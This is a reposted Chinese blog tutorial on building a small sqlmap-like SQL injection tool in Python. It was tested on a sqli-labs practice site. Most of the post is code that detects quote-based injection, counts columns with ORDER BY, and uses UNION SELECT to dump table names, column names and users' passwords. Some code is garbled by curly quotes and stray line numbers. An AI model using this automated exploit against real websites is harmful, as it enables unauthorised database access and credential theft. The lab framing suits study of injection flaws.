网络安全初入茅庐 --- 简易 sqlmap 制作(转载)

前景提要
学习网络安全有一段时间了,用惯了其他人编写的工具,决心自己写一个入门级别比较简单的小工具自己使用练习。

运行演示
进入一个 sqli-lab 的靶场当作测试网站。
在这里插入图片描述
获取其 url 地址:https://96e2b87c-897e-3af7-bdc1-fdfea8bde004-1.anquanlong.com/Less-1/index.php?id=1
运行程序
在这里插入图片描述
代码解析
首先检测网站是否存在 sql 注入,通过闭合单双引号以及布尔判断检测
def can_inject(text_url):
text_list = ["%27","%22"]
for item in text_list:
target_url1 = text_url + str(item) + “%20” + “and%201=1%20–+”
target_url2 = text_url + str(item) + “%20” + “and%201=2%20–+”
result1 = send_request(target_url1)
result2 = send_request(target_url2)
soup1 = BeautifulSoup(result1,‘html.parser’)
fonts1 = soup1.find_all(‘font’)
content1 = str(fonts1[2].text)
soup2 = BeautifulSoup(result2,‘html.parser’)
fonts2 = soup2.find_all(‘font’)
content2 = str(fonts2[2].text)
if content1.find(‘Login’) != -1 and content2 is None or content2.strip() is ‘’:
log(‘使用’ + item + “发现数据库漏洞”)
return True,item
else:log(‘使用’ + item + “未发现数据库漏洞”)
return False,None
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
如果检测出存在 sql 注入漏洞的话,通过 order by 检测字段列数
def text_order_by(url,symbol):
flag = 0
for i in range(1,100):
log(‘正在查找字段’ + str(i))
text_url = url + symbol + “%20order%20by%20” + str(i) + “–+”
result = send_request(text_url)
soup = BeautifulSoup(result,‘html.parser’)
fonts = soup.find_all(‘font’)
content = str(fonts[2].text)
if content.find(‘Login’) == -1:
log(‘获取字段成功 -> ’ + str(i) + “个字段”)
flag = i
break
return flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
拿到每个字段后根据 union_select 联合查询检测可视化位置和字段位置
def text_union_select(url,symbol,flag):
prefix_url = get_prefix_url(url)
text_url = prefix_url + “=0” + symbol + “%20union%20select%20”
for i in range(1,flag):
if i == flag - 1:text_url += str(i) + “%20–+”
else:text_url += str(i) + “,”
result = send_request(text_url)
soup = BeautifulSoup(result,‘html.parser’)
fonts = soup.find_all(‘font’)
content = str(fonts[2].text)
for i in range(1,flag):
if content.find(str(i)) != -1:
temp_list = content.split(str(i))
return i,temp_list
1
2
3
4
5
6
7
8
9
10
11
12
13
14
通过访问网页找到网页内容获取数据库名
def get_database(url,symbol):
text_url = url + symbol + “aaaaaaaaa”
result = send_request(text_url)
if result.find(‘MySQL’) != -1:return “MySQL”
elif result.find(‘Oracle’) != -1:return “Oracle”
1
2
3
4
5
获取数据表名
def get_tables(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + “=0” +symbol + “%20union%20select%20”
for i in range(1,flag):
if i == index:text_url += “group_concat(table_name)” + “,”
elif i == flag - 1:text_url += str(i) + “%20from%20information_schema.tables%20where%20table_schema=database()%20–+”
else:text_url += str(i) + “,”
result = send_request(text_url)
soup = BeautifulSoup(result,‘html.parser’)
fonts = soup.find_all(‘font’)
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]
1
2
3
4
5
6
7
8
9
10
11
12
获取字段名
def get_columns(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + “=0” +symbol + “%20union%20select%20”
for i in range(1,flag):
if i == index:text_url += “group_concat(column_name)” + “,”
elif i == flag - 1:
text_url += str(i) + “%20from%20information_schema.columns%20where%20”
“table_name=‘users’%20and%20table_schema=database()%20–+”
else:text_url += str(i) + ‘,’
result = send_request(text_url)
soup = BeautifulSoup(result,‘html.parser’)
fonts = soup.find_all(‘font’)
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
获取字段内容
def get_data(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + “=0” +symbol + “%20union%20select%20”
for i in range(1,flag):
if i == index:text_url += “group_concat(id,0x3a,username,0x3a,password)” + “,”
elif i == flag - 1:text_url += str(i) + ‘%20from%20users%20–+’
else:text_url += str(i) + “,”
result = send_request(text_url)
soup = BeautifulSoup(result,‘html.parser’)
fonts = soup.find_all(‘font’)
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]
1
2
3
4
5
6
7
8
9
10
11
12
得到每个字段后,循环遍历出字段中的内容在输出位置显示
datas = get_data(url, symbol, flag, index, temp_list).split(’,’)
temp = columns.split(’,’)
print(’%-12s%-12s%-12s’ % (temp[0], temp[1], temp[2]))
for data in datas:
temp = data.split(’:’)
print(’%-12s%-12s%-12s’ % (temp[0], temp[1], temp[2]))
1
2
3
4
5
6
完整代码

imitate_sqlmap.py

import time,requests
from bs4 import BeautifulSoup

def log(content):
this_time = time.strftime(’%H:%M:%S’,time.localtime(time.time()))
print("["+str(this_time)+"]" + content)

def send_request(url):
res = requests.get(url)
result = str(res.text)
return result

def can_inject(text_url):
text_list = ["%27","%22"]
for item in text_list:
target_url1 = text_url + str(item) + “%20” + “and%201=1%20–+”
target_url2 = text_url + str(item) + “%20” + “and%201=2%20–+”
result1 = send_request(target_url1)
result2 = send_request(target_url2)
soup1 = BeautifulSoup(result1,‘html.parser’)
fonts1 = soup1.find_all(‘font’)
content1 = str(fonts1[2].text)
soup2 = BeautifulSoup(result2,‘html.parser’)
fonts2 = soup2.find_all(‘font’)
content2 = str(fonts2[2].text)
if content1.find(‘Login’) != -1 and content2 is None or content2.strip() is ‘’:
log(‘使用’ + item + “发现数据库漏洞”)
return True,item
else:log(‘使用’ + item + “未发现数据库漏洞”)
return False,None

def text_order_by(url,symbol):
flag = 0
for i in range(1,100):
log(‘正在查找字段’ + str(i))
text_url = url + symbol + “%20order%20by%20” + str(i) + “–+”
result = send_request(text_url)
soup = BeautifulSoup(result,‘html.parser’)
fonts = soup.find_all(‘font’)
content = str(fonts[2].text)
if content.find(‘Login’) == -1:
log('获取字段成功 -> ’ + str(i) + “个字段”)
flag = i
break
return flag

def get_prefix_url(url):
splits = url.split(’=’)
splits.remove(splits[-1])
prefix_url = ‘’
for item in splits:
prefix_url += str(item)
return prefix_url

def text_union_select(url,symbol,flag):
prefix_url = get_prefix_url(url)
text_url = prefix_url + “=0” + symbol + “%20union%20select%20”
for i in range(1,flag):
if i == flag - 1:text_url += str(i) + “%20–+”
else:text_url += str(i) + “,”
result = send_request(text_url)
soup = BeautifulSoup(result,‘html.parser’)
fonts = soup.find_all(‘font’)
content = str(fonts[2].text)
for i in range(1,flag):
if content.find(str(i)) != -1:
temp_list = content.split(str(i))
return i,temp_list

def exec_function(url,symbol,flag,index,temp_list,function):
prefix_url = get_prefix_url(url)
text_url = prefix_url + “=0” + symbol + “%20union%20select%20”
for i in range(1,flag):
if i == index:text_url += function + “,”
elif i == flag - 1:text_url += str(i) + “%20–+”
else:text_url += str(i) + “,”
result = send_request(text_url)
soup = BeautifulSoup(result,‘html.parser’)
fonts = soup.find_all(‘font’)
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]

def get_database(url,symbol):
text_url = url + symbol + “aaaaaaaaa”
result = send_request(text_url)
if result.find(‘MySQL’) != -1:return “MySQL”
elif result.find(‘Oracle’) != -1:return “Oracle”

def get_tables(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + “=0” +symbol + “%20union%20select%20”
for i in range(1,flag):
if i == index:text_url += “group_concat(table_name)” + “,”
elif i == flag - 1:text_url += str(i) + “%20from%20information_schema.tables%20where%20table_schema=database()%20–+”
else:text_url += str(i) + “,”
result = send_request(text_url)
soup = BeautifulSoup(result,‘html.parser’)
fonts = soup.find_all(‘font’)
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]

def get_columns(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + “=0” +symbol + “%20union%20select%20”
for i in range(1,flag):
if i == index:text_url += “group_concat(column_name)” + “,”
elif i == flag - 1:
text_url += str(i) + “%20from%20information_schema.columns%20where%20”
“table_name=‘users’%20and%20table_schema=database()%20–+”
else:text_url += str(i) + ‘,’
result = send_request(text_url)
soup = BeautifulSoup(result,‘html.parser’)
fonts = soup.find_all(‘font’)
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]

def get_data(url,symbol,flag,index,temp_list):
prefix_url = get_prefix_url(url)
text_url = prefix_url + “=0” +symbol + “%20union%20select%20”
for i in range(1,flag):
if i == index:text_url += “group_concat(id,0x3a,username,0x3a,password)” + “,”
elif i == flag - 1:text_url += str(i) + ‘%20from%20users%20–+’
else:text_url += str(i) + “,”
result = send_request(text_url)
soup = BeautifulSoup(result,‘html.parser’)
fonts = soup.find_all(‘font’)
content = str(fonts[2].text)
return content.split(temp_list[0])[1].split(temp_list[1])[0]

def sqlmap(url):
log(‘欢迎来到SQL注入工具’)
log(‘正在进行SQL注入’)
result,symbol = can_inject(url)
if not result:
log(‘此网站不存在SQL漏洞,退出SQL注入’)
return False
log(‘此网站存在SQL注入漏洞,请等待’)
flag = text_order_by(url,symbol)
index,temp_list = text_union_select(url,symbol,flag)
database = get_database(url,symbol)
version = exec_function(url,symbol,flag,index,temp_list,‘version()’)
this_database = exec_function(url,symbol,flag,index,temp_list,‘database()’)
log(‘当前数据库 -> ‘+ database.strip() + version.strip())
log(‘数据库名 -> ’ + this_database.strip())
tables = get_tables(url,symbol,flag,index,temp_list)
log(‘数据表名 -> ’ + tables.strip())
columns = get_columns(url,symbol,flag,index,temp_list)
log(‘数据列 -> ’ + columns .strip())
log(‘试图得到全部列…’)
datas = get_data(url, symbol, flag, index, temp_list).split(’,’)
temp = columns.split(’,’)
print(’%-12s%-12s%-12s’ % (temp[0], temp[1], temp[2]))
for data in datas:
temp = data.split(’:’)
print(’%-12s%-12s%-12s’ % (temp[0], temp[1], temp[2]))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
PyPi打包为可执行文件
在 cfg 文件中添加 entry_points 参数即可。
entry_points参数为一个imitate_sqlmap通过setuptools注册的一个外部可以直接调用的接口。
在imitate_sqlmap的setup.py里注册entry_points如下:

setup(
name=‘imitate_sqlmap’,
entry_points={
‘imitate_sqlmap.api.sqlmap’:[
‘databases=imitate_sqlmap.api.sqlmap.databases:main’,
],
)
1
2
3
4
5
6
7
该 setup() 函数注册了一个 entry_point ,属于 imitate_sqlmap.api.sqlmap.group 。注意,如果多个其它不同的 imitate_sqlmap 利用 imitate_sqlmap.api.sqlmap 来注册 entry_point ,那么我用 imitate_sqlmap.api.sqlmap 来访问 entry_point 时,将会获取所有已注册过的 entry_point。

原文链接:https://blog.csdn.net/qq_45414559/article/details/107896039?utm_medium=distribute.pc_feed.none-task-blog-vip_agree_hot-1.nonecase&depth_1-utm_source=distribute.pc_feed.none-task-blog-vip_agree_hot-1.nonecase&request_id=5f3066708c9fb674c67239e9

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值